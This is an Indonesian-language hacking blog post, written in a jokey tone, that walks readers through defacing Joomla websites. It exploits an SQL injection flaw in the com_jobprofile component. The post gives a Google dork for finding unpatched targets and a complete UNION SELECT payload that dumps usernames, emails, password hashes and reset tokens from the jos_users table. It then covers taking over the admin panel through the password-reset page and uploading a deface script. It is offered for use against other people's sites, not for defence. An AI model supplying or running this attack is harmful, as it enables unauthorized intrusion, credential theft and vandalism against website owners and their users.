Cara Deface Hacked Joomla SQL Injection Vulnerability dengan teknik gabungan Exploit +UNION

Cara Deface Hacked Joomla SQL Injection Vulnerability dengan teknik gabungan Exploit +UNION



Malam sahabat ROG, masih ada suaranya-?
Hohoho…. Bercanda, sob..
Yesudah jangan lama-lama bercandanya. SERIUS niih…
hehehe…

Kali ini Rafi Orilya Groups akan berbagi tutorial Hack Joomla SQL Injection Vulnerability dengan teknik gabungan Exploit.
Pertama-tama kami beri wawasan mengenai deface itu.
Deface adalah mengubah suatu tampilan, jadi Deface Web adalah mengubah tampilan web tersebut sesuai keinginan kita. Hehehe.. :D, mau diganti foto gue juga gapapa… wkakaka…
Yang penting happy…

Yang dibutuhkan adalah :
1. Dork-dork yang kreatif sesuai target
2. Kesabaran dalam mencari web target yang belum ter Patch

hanya itu yang kita butuhkan dalam mendeface suatu web.
Mungkin banyak sekali defacer-defacer Indonesia yang sudah akrab ditelinga kita, tapi bagaimana mereka melakukan itu-? (itulah yang kita pikirkan)
Baik… kami berbagi tutor bagaimana salah satu dari mereka melakukan Deface pada web dengan mencari celah pada web tersebut.

baik…. Ikuti langkah-langkah dibawah :

* Langkah pertama yang harus kita lakukan adalah mencari target.
Silahkan gunakan dork dibawah untuk mencari target :
Dork => inurl:"index.php?option=com_jobprofile”
Dork bisa kalian ganti sesuai kreatifitas sobat…
Dork digunakan dimesin pencari Goole (Google Serba Tahu)
* Selanjutnya kita cek web tersebut apakah bisa kita lanjutkan ke tahap selanjutnya.
Silahkan tambahkan ( – ) sebelum nomor ID
Contoh :
http://www.target.com/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1
Atau tambahkan tanda ( ‘ ) pada akhir Number ID
JIka muncul pesan “Eror” kita lanjutkan ke langkah selanjutnya

* Selanjutnya kita Exploitasi web tersebut dengan Exploit dibawah :
Silahkan gabungkan exploitnya :
+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users–

Letakan diakhir URL tersebut sehingga akan menjadi :
http://www.target.com/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,id,name,username,email,password,usertype,block,sendEmail,gid,registerDate,lastvisitDate,activation,params),3,4,5,6,7,8,9+from+jos_users--
Nahh disitu akan keluar Email dan Tokennya silahkan copy dan simpan baik-baik.
Jangan sampe diambil sama pacar.
WOOOWW.. :D

* Sekarang kita masuk ke halaman reset password :
kita tambahkan : /index.php?option=com_user&view=reset
Contoh :  http://www.target.com/index.php?option=com_user&view=reset

Oke dah, masukin email dan passwordnya yang tadi.
Sekarang masuk ke control panel web tersebut.
Silahkan ubah html pada web tersebut.
Atau bisa juga sobat masukkan/ upload Script deface sobat.

Perhatian!!!
Kalau tokennya mengandung symbol 
$$$$ (Salt) maka token tidak akan bekerja.
Jadi cari target yang lain saja.


Saya bukan master Defacer jadi mohon maaf jika ada kesalahan atau salah kata dari saya, semoga postingan kali ini bermanfaat bagi sobat.
Baik pula jika memberikan komentar dibawah.

Artikel DIlindungi
Sertakan alamat blog ini jika mengcopy paste
(Hak Cipta Dilindungi)


Terima Kasih
Rafi Orilya Groups
by Rafi Aldiansyah Asikin
Previous
Next Post »